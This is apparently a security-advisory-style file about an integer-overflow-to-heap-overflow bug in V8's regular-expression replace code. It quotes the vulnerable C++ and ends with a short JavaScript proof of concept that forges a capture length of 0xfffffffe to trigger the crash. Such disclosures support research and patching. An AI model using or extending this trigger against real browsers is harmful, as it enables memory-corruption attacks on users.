39 lines
No EOL
985 B
JavaScript
39 lines
No EOL
985 B
JavaScript
/*
|
|
Here's a snippet of the method.
|
|
ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
|
|
isolate, captures_length_obj,
|
|
Object::ToLength(isolate, captures_length_obj));
|
|
const int captures_length = PositiveNumberToUint32(*captures_length_obj);
|
|
...
|
|
if (functional_replace) {
|
|
const int argc =
|
|
has_named_captures ? captures_length + 3 : captures_length + 2; <<-- (a)
|
|
|
|
ScopedVector<Handle<Object>> argv(argc);
|
|
|
|
int cursor = 0;
|
|
for (int j = 0; j < captures_length; j++) {
|
|
argv[cursor++] = captures[j];
|
|
}
|
|
|
|
// (b)
|
|
argv[cursor++] = handle(Smi::FromInt(position), isolate);
|
|
argv[cursor++] = string;
|
|
|
|
The variable "captures_length" can be controlled by the user, so an integer overflow may occur at (a) which causes a heap overflow at (b).
|
|
|
|
|
|
PoC:
|
|
*/
|
|
|
|
let cnt = 0;
|
|
let reg = /./g;
|
|
reg.exec = () => {
|
|
if (cnt++ == 0)
|
|
return {length: 0xfffffffe};
|
|
|
|
cnt = 0;
|
|
return null;
|
|
};
|
|
|
|
''.replace(reg, () => {}); |